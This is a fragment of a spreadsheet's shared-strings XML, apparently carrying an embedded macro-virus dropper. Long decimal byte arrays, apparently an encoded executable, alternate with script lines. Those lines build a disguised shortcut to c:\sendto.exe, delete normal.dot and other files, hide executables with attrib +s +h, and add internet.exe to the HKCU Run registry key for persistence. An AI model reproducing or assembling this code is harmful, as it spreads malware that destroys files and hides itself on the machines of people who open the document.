      <t xml:space="preserve">&amp; "\" </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>&amp; ff.name)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">164 244 102 220 197 56 161 225 116 150 49 43 118 246 162 149 183 251 53 143 250 251 165 154 13 251 183 205 185 244 217 222 95 247 173 121 101 200 222 27 103 248 228 38 103 202 71 15 155 18 165 211 7 110 254 246 218 194 41 113 71 220 142 83 183 227 186 244 248 217 49 236 66 135 228 91 155 238 12 57 250 194 194 105 7 175 221 61 236 73 182 254 181 253 186 243 238 157 239 71 88 175 230 52 12 31 63 235 253 183 46 85 36 29 219 88 50 99 250 149 181 159 204 153 107 189 34 20 237 74 95 231 78 200 157 191 187 100 222 136 162 111 207 236 232 49 229 235 81 27 14 247 185 207 78 111 74 110 174 189 61 233 222 217 71 29 7 255 145 55 250 229 115 205 231 26 31 49 179 163 217 181 255 63 175 253 207 127 54 195 100 160 19 227 84 94 213 163 6 31 50 91 249 89 231 133 204 192 89 197 20 65 142 134 89 172 44 194 100 245 140 133 120 73 77 210 184 214 135 29 91 210 106 248 187 48 168 119 48 29 65 30 113 210 124 70 221 53 232 139 233 35 80 141 186 155 114 29 79 29 140 42 150 208 84 97 104 52 74 27 31 66 139 8 83 46 50 12 173 67 24 90 199 48 180 168 48 52 77 24 90 167 48 188 116 14 67 139 126 146 246 15 155 162 190 16 88 36 0 128 67 75 236 61 11 108 28 199 117 179 123 191 229 241 142 60 146 71 241 68 241 179 164 40 234 72 253 142 20 45 159 28 73 62 82 148 124 180 101 153 142 21 155 141 29 248 232 144 6 5 211 212 89 162 156 179 173 20 231 68 9 104 192 13 216 64 104 207 169 139 50 128 209 178 109 96 80 110 106 51 128 139 48 128 11 176 129 129 92 218 162 38 2 3 102 218 0 101 138 6 165 211 166 33 106 135 215 153 183 111 246 199 217 229 81 138 219 160 232 17 199 55 239 205 239 205 155 55 111 102 222 206 236 81 90 72 80 94 88 144 174 74 64 171 22 208 152 100 236 180 26 1 173 86 64 171 19 208 162 64 179 242 87 47 160 237 18 228 109 16 208 98 130 188 187 5 233 26 5 180 61 2 90 147 128 214 44 160 181 8 104 173 54 154 31 30 114 91 31 37 210 200 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">205 93 164 33 68 204 91 208 22 15 25 144 175 147 95 65 47 203 84 30 125 240 224 254 8 104 106 53 206 142 236 113 40 123 65 235 110 210 16 224 94 194 125 236 153 171 188 36 47 53 75 3 158 127 132 2 36 40 224 14 40 96 47 168 53 175 190 61 5 195 162 20 214 238 30 156 102 197 246 191 4 153 216 184 218 5 143 209 253 84 122 30 172 85 194 90 169 206 151 60 164 255 117 72 234 129 242 143 65 210 22 24 14 230 230 209 161 80 82 180 242 251 191 2 233 189 144 254 78 72 223 133 195 213 40 154 14 147 82 157 93 28 3 82 250 69 150 213 7 89 79 67 214 131 48 162 204 85 209 209 84 162 146 12 19 203 70 166 153 74 178 38 207 114 251 33 247 32 228 110 132 177 103 174 152 226 191 242 146 1 202 24 75 27 128 180 236 40 3 195 20 192 146 136 85 128 108 170 16 11 2 22 65 172 18 176 123 16 11 65 190 52 98 97 136 227 165 84 1 118 28 177 106 75 153 17 192 124 136 213 0 54 132 88 173 165 148 58 75 41 81 168 239 20 98 245 128 249 17 219 5 41 155 17 107 0 108 55 98 49 72 73 16 219 13 113 7 16 107 4 236 32 98 123 0 59 132 88 19 96 135 17 107 6 108 15 98 45 128 53 33 214 10 24 59 210 241 30 237 129 235 180 105 147 242 41 210 79 213 242 0 60 255 59 69 107 168 218 209 31 27 95 170 96 204 181 9 104 237 2 155 176 87 144 174 67 144 110 159 128 214 41 160 237 23 208 226 2 90 151 128 214 45 224 229 128 128 118 80 64 59 36 40 239 176 128 118 68 64 75 8 104 61 2 90 175 160 222 163 2 90 159 128 118 135 128 118 76 64 187 83 64 75 10 104 199 5 180 187 4 180 79 9 104 39 4 180 147 2 218 41 129 12 238 182 209 152 86 171 160 213 61 168 227 109 128 29 65 172 29 198 20 31 153 123 33 174 17 177 14 136 171 71 108 31 96 109 136 117 2 118 23 98 251 1 251 20 98 113 192 78 32 214 5 216 89 196 186 161 134 26 196 14 0 38 33 118 16 48 47 98 135 32 159 140 216 97 192 2 136 29 1 172 3 177 4 96 237 136 245 0 22 </t>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t xml:space="preserve">69 172 23 202 84 16 59 10 113 123 17 235 131 184 90 196 238 0 172 14 177 99 128 117 35 118 39 96 113 196 146 128 237 71 236 56 96 157 136 221 5 88 23 98 159 2 172 23 177 19 128 85 32 118 18 176 1 196 78 1 103 97 196 238 6 108 31 218 161 20 243 175 201 59 179 59 34 59 148 18 232 75 191 128 54 32 160 157 22 232 223 160 128 118 70 64 59 43 160 221 35 160 165 5 180 33 1 47 247 10 210 221 39 160 157 19 228 189 95 144 238 188 128 246 128 32 239 176 32 221 131 130 241 150 130 222 107 197 190 236 7 76 69 108 192 50 71 159 6 29 8 34 54 8 88 8 177 51 128 85 34 118 22 48 15 98 247 0 86 141 88 26 176 22 196 134 160 134 20 98 247 66 92 3 98 247 1 22 67 236 28 164 220 133 216 253 22 173 62 111 209 234 7 32 101 63 98 195 16 119 20 177 7 33 238 36 232 106 156 140 209 1 123 65 218 94 31 79 201 181 228 45 63 91 227 164 76 107 163 102 216 19 193 146 2 22 60 119 19 223 191 209 36 126 88 135 5 255 127 95 250 127 244 115 1 159 219 221 234 57 76 186 248 147 74 248 91 120 229 158 191 100 3 114 165 134 159 191 124 156 60 68 55 224 195 20 246 222 2 255 108 33 124 43 247 191 226 242 214 250 143 222 90 253 82 37 158 147 46 183 254 10 60 159 203 62 47 92 235 185 173 254 243 163 252 119 210 126 102 174 126 249 176 225 70 149 93 206 127 111 98 223 50 88 238 249 111 102 214 26 224 168 10 129 13 68 163 237 252 119 11 158 255 86 203 56 255 205 166 243 79 234 252 55 107 147 253 252 247 25 164 187 157 255 230 231 219 135 5 231 191 89 28 251 62 226 112 254 251 115 152 198 124 254 155 225 252 252 247 184 233 252 247 4 194 79 242 115 249 51 121 212 138 60 126 185 134 84 152 180 149 233 71 166 157 107 140 4 218 49 228 51 199 251 201 143 31 213 240 155 56 89 124 15 11 120 5 225 79 251 140 252 236 255 69 76 255 10 150 243 187 136 51 174 120 217 10 213 27 214 139 63 69 124 20 75 168 241 27 105 249 71 34 127 6 99 218 147 169 144 180 83 </t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t xml:space="preserve">222 255 147 247 40 36 242 71 164 1 235 125 27 30 179 64 208 119 31 29 146 237 222 92 169 45 204 180 255 193 92 233 209 233 146 162 176 159 37 232 144 72 152 45 243 27 167 75 164 219 155 45 209 68 62 15 233 240 146 112 145 142 66 37 87 10 39 168 84 39 179 165 95 176 98 255 161 49 87 106 250 109 58 14 188 211 165 95 176 151 100 236 207 148 246 109 205 18 103 46 19 47 201 149 104 161 178 54 42 217 184 110 162 252 116 224 3 162 90 248 31 50 217 131 168 126 42 158 208 156 30 50 77 191 1 200 156 100 58 204 174 244 208 177 165 217 22 249 196 9 61 196 126 153 85 172 63 17 93 47 100 203 201 252 65 224 166 131 72 18 175 209 67 7 65 65 110 218 114 126 191 133 63 223 153 66 6 78 76 235 245 230 244 208 53 82 174 254 6 72 162 157 63 238 241 130 245 224 58 150 109 55 167 147 201 15 53 159 48 249 45 244 28 61 135 240 56 194 26 132 47 157 66 125 198 227 251 199 209 61 253 98 202 125 28 252 176 82 131 31 34 172 192 174 104 67 56 138 244 231 16 31 10 107 240 25 14 79 106 176 31 159 247 13 33 206 199 31 31 103 21 218 143 173 147 30 132 223 68 248 61 132 63 214 224 99 212 124 37 168 137 221 75 205 14 93 60 118 155 8 125 68 138 32 161 7 8 236 7 219 183 144 182 164 122 130 170 205 150 84 99 68 170 181 144 122 168 105 126 82 68 28 223 90 222 81 59 105 148 114 104 35 221 65 205 190 141 255 94 35 77 2 139 239 179 167 233 17 54 200 202 85 47 253 59 126 171 173 28 163 156 217 210 29 167 41 69 165 117 32 233 73 252 235 166 60 222 73 217 233 133 239 24 13 31 119 168 84 32 48 107 51 159 44 43 91 178 140 222 101 58 240 129 172 91 223 62 92 67 36 113 126 149 111 99 45 179 249 125 137 174 70 73 94 49 246 27 249 10 189 166 246 23 169 217 164 163 52 195 108 63 13 159 160 171 214 28 134 217 70 112 81 15 203 100 9 195 9 58 247 46 87 104 225 40 109 192 50 210 59 168 60 87 49 252 105 242 60 41 84 106 225 12 157 243 51 152 158 185 85 139 212 </t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t xml:space="preserve">12 122 177 252 9 191 157 159 16 240 3 15 140 104 26 47 53 193 249 0 175 235 16 72 132 243 22 35 6 111 42 134 253 212 38 41 30 45 28 162 235 162 136 196 235 173 102 82 128 240 48 21 124 178 146 167 169 131 27 93 60 239 140 169 252 89 83 249 195 196 72 95 192 112 140 174 159 230 137 209 174 37 83 222 17 61 236 35 69 12 179 135 56 89 228 167 138 206 30 25 201 104 227 138 169 174 85 83 120 205 84 239 156 100 212 155 84 180 112 55 121 150 204 42 6 255 19 138 193 67 86 49 241 160 152 234 82 140 242 243 166 240 176 98 200 106 17 94 69 165 192 234 117 89 49 248 143 201 6 255 69 201 200 187 32 25 117 69 2 6 159 138 137 31 213 84 87 220 92 102 192 40 51 30 48 210 196 60 6 15 235 40 135 94 186 54 76 5 12 153 67 36 166 223 48 245 133 246 42 45 67 175 184 190 197 29 244 63 137 237 98 171 234 66 152 151 67 200 98 152 151 79 229 96 10 23 49 204 86 149 170 41 253 42 134 217 244 183 30 50 209 77 225 117 83 57 43 33 99 220 45 202 134 172 230 100 163 93 243 24 102 46 138 100 80 11 55 209 181 118 46 200 199 197 221 164 16 228 242 188 155 44 4 141 190 206 6 141 114 38 76 225 140 158 166 146 140 4 13 57 47 5 141 49 78 130 198 24 79 120 140 49 158 149 141 49 190 97 26 227 235 38 253 73 123 196 242 79 209 188 218 24 15 145 44 150 201 214 21 57 15 111 35 149 173 79 11 179 165 192 44 202 135 21 157 13 25 118 163 96 43 31 86 139 146 66 87 25 159 83 127 254 78 210 100 255 126 207 155 1 120 13 247 94 124 23 126 137 230 27 198 220 105 216 55 189 41 183 17 191 164 146 40 64 31 121 21 210 61 133 249 174 17 99 117 172 64 250 203 242 91 132 165 98 7 251 212 147 42 185 38 171 228 186 204 40 210 46 137 120 23 104 83 95 166 187 164 27 20 198 168 153 59 70 219 51 76 191 215 31 52 94 81 246 236 213 133 151 88 145 248 226 55 242 38 163 75 108 48 69 105 5 175 225 51 50 254 97 103 208 181 159 87 10 209 248 115 164 32 53 147 247 </t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t xml:space="preserve">241 181 90 112 237 147 29 156 133 4 23 77 105 25 251 147 218 149 6 118 190 75 251 209 38 83 90 22 191 108 43 223 92 86 123 175 65 127 194 68 175 116 40 79 53 133 199 105 217 239 219 120 187 68 121 87 164 143 129 111 85 192 251 164 141 247 115 146 51 111 116 75 104 106 135 56 60 76 203 200 73 118 30 196 105 47 82 222 74 165 215 32 117 143 128 55 231 48 95 102 151 74 131 208 103 202 219 95 125 238 195 155 21 3 127 124 238 230 71 109 31 174 253 83 247 201 143 62 254 175 185 137 200 159 80 203 125 224 232 51 127 41 58 121 245 135 207 255 249 227 103 254 253 107 253 191 255 131 170 223 121 35 219 189 18 65 23 130 15 93 7 38 69 71 140 77 93 138 61 155 189 106 141 177 251 207 240 2 136 174 86 172 40 6 63 64 124 25 83 176 227 11 255 59 55 231 217 219 198 100 242 80 68 227 83 34 15 133 244 208 13 45 20 36 25 26 234 148 153 233 79 208 80 11 44 142 78 181 243 150 53 158 43 51 164 124 114 57 96 252 179 46 125 140 154 208 159 48 167 11 237 70 182 228 56 75 191 255 89 109 244 248 179 87 111 156 98 221 176 151 34 51 48 254 121 151 24 29 149 130 206 249 90 239 31 188 125 173 183 107 240 79 239 255 210 208 43 247 60 243 238 110 193 149 112 187 62 245 249 126 20 174 152 249 187 115 223 25 244 121 143 252 243 135 223 45 83 159 236 217 236 85 151 175 79 131 59 214 162 177 95 179 222 165 36 166 79 143 158 211 181 40 98 215 39 182 227 237 208 247 190 19 122 40 162 135 162 122 40 166 135 154 244 144 170 135 66 122 40 174 135 14 234 161 4 134 12 77 149 79 56 237 255 119 164 149 162 208 13 222 202 69 90 219 146 172 149 60 169 215 145 213 67 226 253 63 15 105 165 240 94 149 200 121 186 46 120 1 142 172 38 232 58 32 65 87 227 108 111 121 8 41 9 75 232 244 22 154 249 175 143 110 44 191 8 74 200 122 72 146 230 233 4 41 231 55 209 250 104 111 104 99 62 88 66 172 62 41 130 222 78 230 209 172 172 81 101 141 230 201 16 34 126 133 222 53 58 183 51 72 247 10 </t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t xml:space="preserve">227 5 153 77 156 236 48 219 171 48 62 46 126 121 115 203 91 206 24 84 245 135 55 99 80 143 140 233 20 26 187 100 226 102 43 95 73 72 255 165 185 40 240 181 137 47 117 100 222 154 77 151 244 128 123 180 109 30 143 79 144 157 227 204 251 206 134 248 251 20 175 32 90 59 60 80 79 8 234 113 107 47 131 183 19 79 200 246 242 220 174 252 246 185 119 100 109 247 91 42 205 234 134 204 147 178 203 109 66 214 22 14 57 83 59 25 100 116 5 227 217 39 115 253 49 40 143 167 203 163 15 141 237 43 20 147 169 132 121 71 66 3 136 50 205 35 156 65 56 139 176 128 112 14 225 60 194 5 132 139 8 151 16 46 35 44 34 92 65 184 138 144 189 173 212 77 46 108 31 86 244 104 94 239 105 83 123 147 148 150 242 110 150 88 123 216 207 194 122 136 33 231 172 87 243 242 103 224 233 130 70 143 33 157 165 31 52 209 225 201 209 245 183 116 57 141 72 218 66 244 118 251 27 218 136 111 29 254 77 125 75 15 227 143 201 181 207 36 15 152 51 80 174 29 54 250 42 202 85 53 245 3 188 117 5 211 71 108 114 5 187 131 122 85 100 119 152 125 218 219 113 136 45 221 130 79 235 23 246 227 193 21 38 58 47 151 253 182 176 189 220 89 175 6 227 62 13 38 16 38 17 166 16 166 17 14 35 28 65 152 65 56 129 144 221 117 82 252 26 127 239 91 235 251 42 231 227 93 27 31 73 191 198 247 178 141 111 51 63 203 8 139 8 87 16 174 34 92 67 184 142 112 131 243 195 116 223 86 31 231 99 94 32 15 198 119 193 33 253 140 3 61 39 40 103 6 235 207 251 17 71 56 139 176 224 39 120 136 218 184 42 145 224 54 92 182 206 85 78 116 144 11 33 154 31 9 63 131 120 35 254 85 185 32 139 181 53 196 214 187 180 210 194 123 3 3 222 178 221 154 162 100 201 237 189 159 229 120 164 111 47 149 200 25 252 129 164 203 41 89 198 101 148 237 188 158 97 240 106 48 75 191 46 49 175 131 2 71 81 137 201 179 200 61 46 204 209 49 108 242 70 172 34 157 61 99 204 32 253 44 63 205 14 158 42 170 245 50 247 184 224 59 </t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t xml:space="preserve">146 177 156 89 217 240 238 128 23 71 224 5 225 203 109 73 90 246 48 15 69 66 247 72 100 49 102 4 97 196 228 113 48 227 220 38 205 114 189 69 184 136 144 219 221 132 100 165 47 216 202 91 66 184 194 117 85 178 198 175 219 232 17 132 49 94 191 100 205 63 135 248 26 175 79 178 242 179 132 120 146 219 69 164 175 241 122 113 94 140 32 84 17 166 17 142 216 230 231 130 13 242 121 151 205 241 96 31 17 38 17 22 16 206 34 204 33 92 244 88 235 205 249 108 237 180 217 177 121 91 60 199 137 223 42 63 30 207 237 96 26 158 86 255 220 203 215 110 220 238 197 253 86 124 209 111 229 139 183 63 226 177 202 129 183 55 46 91 229 188 193 203 183 173 75 178 152 127 6 161 226 101 107 169 111 121 218 200 121 249 91 240 12 250 85 192 7 82 255 194 86 38 151 166 200 212 133 167 240 73 4 164 55 201 241 111 104 222 117 196 215 40 252 25 205 217 41 171 228 29 249 8 121 67 142 195 62 103 132 166 121 139 110 107 131 196 120 91 1 75 181 143 28 148 37 58 155 38 228 169 11 111 146 106 178 252 205 31 124 244 183 155 111 172 196 59 63 211 117 248 240 97 154 67 33 223 94 248 238 143 226 157 143 116 189 73 87 119 236 26 45 92 151 39 29 100 144 230 220 71 146 240 255 97 250 127 32 197 164 49 174 233 11 229 227 45 47 171 33 174 159 70 17 151 31 36 223 121 237 189 95 222 252 89 188 51 221 197 106 91 252 240 251 127 21 239 124 96 219 218 204 117 26 118 125 197 203 183 236 210 202 77 210 15 87 159 175 78 147 113 245 225 129 199 207 143 62 77 3 39 213 246 11 19 23 9 191 16 28 121 170 61 28 12 190 60 48 122 69 146 95 78 188 144 72 36 122 19 195 201 158 227 135 72 36 225 81 78 7 72 84 174 149 58 18 137 190 99 95 124 49 124 237 158 201 75 79 140 78 74 197 200 67 217 209 207 75 95 63 59 58 233 189 50 30 26 131 139 189 202 232 19 147 245 173 195 151 199 199 102 199 63 63 57 74 252 67 99 228 166 114 225 242 213 240 192 153 92 246 18 77 24 109 130 123 167 100 116 122 124 112 252 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t xml:space="preserve">242 197 103 61 114 237 215 7 174 94 153 190 244 244 69 255 243 222 65 79 47 187 112 156 35 236 194 241 249 241 47 168 75 75 171 61 225 224 112 190 45 191 79 133 27 202 95 249 198 227 15 144 236 248 84 188 43 28 124 128 76 169 240 11 245 106 228 211 227 87 174 230 95 63 63 158 147 167 201 179 218 29 81 162 93 18 157 184 68 190 128 183 229 201 208 212 133 209 43 79 61 49 90 117 57 112 81 137 122 107 217 123 43 8 87 133 124 123 215 225 135 47 94 185 24 188 65 238 31 159 186 58 48 122 249 138 55 222 46 157 5 225 7 72 221 139 65 82 1 29 163 208 158 185 174 12 77 143 63 45 165 124 216 113 222 206 244 187 62 232 88 194 123 214 75 187 54 12 239 93 240 228 63 219 184 91 211 32 249 145 206 58 118 21 58 119 56 217 159 205 230 79 166 164 51 103 195 65 239 208 147 254 11 240 2 11 50 53 173 158 96 239 111 73 177 251 181 225 224 95 127 246 10 57 220 63 54 22 14 158 153 90 98 55 163 195 193 211 50 157 181 194 101 31 216 115 245 29 145 29 239 230 35 130 208 57 65 121 162 144 123 189 55 202 172 87 144 247 27 34 143 219 240 173 123 215 228 19 239 234 126 135 162 30 250 123 61 180 162 135 222 215 67 171 122 232 39 122 104 77 15 253 171 30 90 215 67 255 161 135 54 244 208 199 219 248 59 206 146 211 244 59 64 142 210 85 90 47 233 39 135 232 55 65 41 44 196 46 240 30 163 214 145 209 238 100 207 103 192 223 145 68 15 9 203 115 148 210 123 104 232 14 244 119 68 246 51 127 199 218 209 157 251 59 248 62 190 59 255 23 178 182 70 106 130 181 167 15 247 201 246 189 88 168 230 117 89 251 101 18 177 127 36 214 77 200 210 230 37 50 135 113 7 105 202 62 250 87 197 30 89 208 124 93 95 214 246 133 33 221 239 65 231 10 9 79 225 0 63 17 228 43 178 173 127 129 216 252 40 49 201 205 143 18 197 242 166 100 46 159 74 201 72 151 151 196 245 195 60 140 112 24 215 19 35 8 217 179 214 202 154 183 229 98 5 115 155 56 251 139 114 116 134 102 107 22 230 47 98 199 240 91 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">233 223 0 121 21 150 251 109 38 121 20 37 35 207 117 132 229 200 1 160 105 191 205 158 125 178 253 182 234 183 238 195 151 137 177 15 55 211 217 243 179 60 238 57 120 125 230 248 12 198 71 4 242 49 167 155 145 141 179 61 162 248 9 140 47 218 232 75 72 95 116 200 183 138 241 5 135 120 182 130 206 227 91 84 69 241 42 198 143 56 196 167 48 62 233 212 126 140 143 9 218 111 214 147 148 108 172 255 44 237 198 252 105 27 61 139 244 117 91 125 69 164 175 56 240 179 238 113 151 87 196 235 46 175 132 215 93 94 195 94 119 121 101 189 238 242 154 245 150 39 175 12 247 119 121 173 249 11 152 95 33 203 155 102 250 28 210 211 246 254 247 185 235 175 234 115 214 95 176 121 222 95 159 191 195 92 111 220 103 156 115 227 233 205 241 139 62 222 78 99 156 155 227 87 48 126 94 18 183 107 3 227 103 28 226 217 3 98 22 63 225 16 159 150 196 246 96 216 239 46 207 172 191 60 123 80 240 27 229 139 226 115 126 222 126 135 113 41 25 242 73 154 108 171 178 155 192 153 23 216 59 85 104 167 115 45 250 143 246 175 154 254 57 233 159 27 223 195 1 119 190 178 129 173 237 50 235 19 223 95 177 51 70 176 47 10 216 218 29 16 235 241 114 192 93 238 107 1 119 61 78 96 125 27 8 89 3 64 94 8 35 8 99 8 217 217 25 139 93 193 242 237 242 204 40 6 191 34 190 242 24 31 119 136 159 83 182 202 19 246 241 54 185 44 99 186 25 167 246 99 252 132 67 188 82 177 149 79 161 253 195 116 19 21 14 243 84 133 49 110 45 227 149 235 179 36 169 66 187 91 33 30 79 115 21 238 253 186 84 225 220 175 161 154 77 72 231 113 93 95 220 75 34 65 126 202 143 157 8 14 144 71 200 13 201 190 222 74 4 157 215 23 150 126 64 126 84 187 92 130 238 227 98 38 232 62 255 207 7 13 253 18 214 139 241 41 167 254 15 26 124 137 226 217 195 112 81 191 169 72 111 165 57 45 227 5 253 33 241 74 113 121 35 149 238 122 157 171 20 235 53 227 211 210 255 149 238 227 103 169 210 221 78 174 58 212 195 218 5 245 33 92 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">175 180 217 255 80 121 118 58 133 233 98 145 242 236 99 58 228 108 255 220 242 229 66 70 255 236 36 223 234 14 234 19 218 235 144 120 92 174 35 93 218 233 252 128 249 192 207 111 182 15 72 103 39 198 202 41 103 162 106 171 60 96 253 97 211 159 5 93 110 214 250 102 28 218 181 22 18 143 131 76 149 56 125 50 188 115 249 10 199 127 149 251 120 153 175 114 183 31 139 97 49 223 171 152 143 249 43 133 235 255 106 172 215 33 126 216 161 221 169 42 231 118 91 250 169 154 235 201 206 244 189 80 237 62 174 23 171 157 199 167 112 220 85 185 151 151 172 22 183 83 141 148 103 7 178 38 126 44 227 182 122 251 113 107 225 51 44 230 99 62 178 253 190 192 178 174 8 25 251 12 203 120 136 24 227 214 82 126 104 171 126 149 83 79 170 102 107 251 44 242 195 114 153 255 219 34 23 204 151 112 88 95 23 48 126 201 65 47 23 49 126 206 33 126 101 155 242 55 48 62 227 144 63 86 187 53 191 217 223 144 170 181 174 7 22 90 202 180 167 181 238 243 217 108 173 187 29 88 168 117 183 3 75 78 122 28 16 211 217 253 39 70 95 171 117 231 123 161 78 108 95 150 28 236 232 8 166 159 136 150 57 47 132 203 27 103 179 97 99 254 16 197 23 235 202 156 183 111 195 110 151 211 158 88 141 117 255 202 247 23 35 81 155 253 141 226 186 189 190 188 114 215 170 141 245 176 101 126 170 19 219 159 100 212 208 23 203 248 10 139 233 145 250 237 237 140 121 190 213 219 87 111 219 191 163 190 173 218 218 59 227 96 223 178 17 195 111 98 25 167 117 219 247 147 165 252 58 247 125 94 33 138 231 29 234 113 253 103 227 91 169 51 198 159 197 158 70 197 242 157 175 223 25 127 177 168 184 253 51 187 202 211 219 101 135 241 61 131 229 22 109 237 33 40 239 137 6 219 186 32 38 30 207 11 245 134 223 192 50 47 213 138 211 79 212 137 249 73 239 218 234 159 17 206 15 53 198 120 118 243 211 110 39 151 149 50 199 125 220 65 254 115 245 226 126 87 99 229 149 187 24 217 186 206 177 236 155 29 236 239 112 237 206 244 39 130 242 26 177 245 231 72 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">149 88 63 83 187 220 231 19 118 117 221 62 159 84 214 124 91 214 238 104 136 247 205 153 189 116 190 219 124 138 168 181 154 95 62 78 180 115 156 50 250 229 45 114 109 112 151 75 188 94 188 31 40 34 189 80 107 235 103 164 231 119 219 218 111 170 199 98 23 27 140 121 220 98 87 176 221 171 187 111 207 206 43 14 250 164 54 138 237 116 182 113 251 117 171 235 252 23 21 203 107 30 219 233 177 239 115 26 157 199 97 57 246 157 221 121 0 255 215 30 219 184 64 62 216 195 48 11 29 251 199 111 227 99 181 113 103 122 206 94 165 32 180 115 56 30 99 77 219 200 169 78 44 39 181 73 172 39 145 168 88 126 137 104 121 254 120 118 81 13 246 159 77 232 255 70 152 110 178 181 171 209 161 93 77 238 126 174 121 140 159 221 166 221 137 38 135 125 109 83 153 235 34 156 95 146 173 14 243 79 131 216 206 20 145 238 179 201 101 196 166 55 27 141 226 121 36 230 96 127 227 77 92 159 108 254 214 38 177 191 181 216 236 190 190 94 111 118 183 135 145 22 177 191 104 22 251 51 214 130 178 69 24 111 177 173 99 91 118 182 79 155 109 52 158 39 89 232 187 196 253 24 143 137 229 49 130 245 202 118 251 215 226 48 111 71 184 190 111 179 46 119 226 35 34 166 111 132 196 227 43 187 71 76 95 220 83 222 58 97 189 81 220 238 133 38 177 222 172 180 150 167 239 204 33 234 230 23 80 213 173 250 178 19 123 29 105 22 175 179 211 205 226 113 180 209 34 78 79 90 157 253 8 150 113 222 104 221 119 20 246 224 179 30 21 237 185 106 43 183 109 103 250 154 113 232 119 165 77 108 63 35 109 226 254 201 181 149 215 63 202 30 241 124 146 67 122 192 70 95 112 160 175 182 242 241 33 182 223 197 86 155 221 81 141 244 22 251 170 138 231 245 117 147 28 193 94 224 251 54 156 246 169 153 221 98 57 230 99 14 254 31 85 172 23 74 141 216 94 37 218 240 156 99 187 173 222 106 35 61 59 119 205 94 71 52 141 103 64 84 236 63 246 137 202 141 222 172 137 46 155 218 1 207 231 218 209 254 237 197 250 16 38 247 218 236 152 169 61 162 207 108 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">251 206 238 35 172 211 244 49 202 243 90 7 214 219 113 251 247 25 20 202 115 186 93 147 7 60 139 54 181 27 124 61 148 62 71 235 153 52 221 51 224 244 34 165 63 102 186 63 48 215 140 243 63 182 43 221 97 235 175 70 113 63 230 91 197 246 96 166 213 120 174 7 231 228 59 233 218 223 196 71 214 62 254 219 140 125 52 75 191 74 59 44 45 184 79 177 76 233 73 27 221 194 79 91 121 254 221 116 204 221 31 147 111 20 183 43 210 200 199 169 205 46 216 236 87 204 166 79 49 140 207 236 179 205 103 166 245 34 107 223 6 141 143 11 218 61 65 229 23 51 209 101 236 71 208 3 65 250 52 77 239 53 201 123 139 255 95 181 242 203 244 146 151 71 76 249 248 245 206 120 167 22 63 67 225 250 166 153 15 212 23 140 159 167 112 85 112 31 98 2 227 151 40 44 10 238 81 172 116 178 51 100 91 233 240 204 120 211 249 158 209 130 173 29 41 90 142 114 80 59 7 99 30 43 107 7 126 51 238 15 49 222 44 235 210 253 232 199 116 154 23 49 126 217 105 158 137 227 121 17 39 191 65 220 253 249 122 58 238 254 124 125 34 238 190 46 157 137 255 119 119 215 31 219 196 117 199 159 207 151 224 56 118 112 182 132 166 165 148 227 32 228 220 36 23 255 128 214 77 73 57 219 4 2 109 33 77 210 66 85 58 226 36 71 156 226 216 198 103 7 103 16 97 126 148 102 157 170 102 108 101 12 117 40 140 182 66 83 170 25 169 5 166 110 195 29 172 141 186 169 13 157 166 69 85 215 24 198 218 252 179 41 157 250 7 154 42 178 247 238 222 139 125 23 219 165 237 166 85 35 74 190 220 123 239 222 189 123 239 251 253 188 239 187 123 223 207 125 193 251 31 46 255 243 121 149 255 206 228 182 183 109 108 198 63 87 61 191 101 115 207 31 22 141 125 49 203 51 229 100 28 230 176 62 91 53 246 89 157 27 223 152 234 220 254 186 80 157 103 95 146 53 247 60 155 180 222 218 122 108 20 183 111 220 138 231 119 44 39 177 76 99 57 141 229 12 150 55 176 68 116 124 178 158 97 201 232 52 241 66 124 126 59 72 216 240 222 172 134 76 153 22 </t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">248 255 25 248 59 137 211 82 80 142 52 124 61 91 74 194 235 164 121 205 115 40 220 63 9 205 184 164 172 25 253 86 245 115 45 94 87 230 123 62 135 243 195 249 244 13 231 183 230 243 23 107 11 175 107 19 181 95 240 188 150 211 216 73 109 102 252 85 237 172 207 243 254 179 182 176 221 33 186 69 173 221 9 117 74 253 132 227 13 29 27 178 200 49 102 113 191 201 250 95 135 253 16 40 109 118 101 95 225 55 17 47 229 54 218 149 251 250 80 227 199 216 236 89 251 97 112 123 17 5 165 172 255 88 90 234 243 140 63 238 247 150 60 239 217 58 113 62 151 39 63 129 243 13 121 242 71 235 11 227 122 170 190 48 174 167 235 11 227 58 162 217 44 132 235 12 95 24 215 5 190 176 126 117 242 95 126 253 40 219 54 30 135 97 141 125 251 249 220 248 30 230 115 227 101 130 87 175 75 16 110 1 205 122 91 214 13 140 103 55 176 4 24 155 12 88 90 176 172 194 146 193 146 195 210 134 165 171 65 241 55 226 13 234 117 5 153 55 42 168 1 42 65 29 164 88 234 48 117 148 250 144 50 128 220 126 119 182 223 18 132 191 165 170 244 136 124 127 196 239 6 89 229 25 216 1 15 205 206 247 127 12 48 125 77 142 244 86 167 226 7 107 227 124 93 54 181 255 56 87 222 166 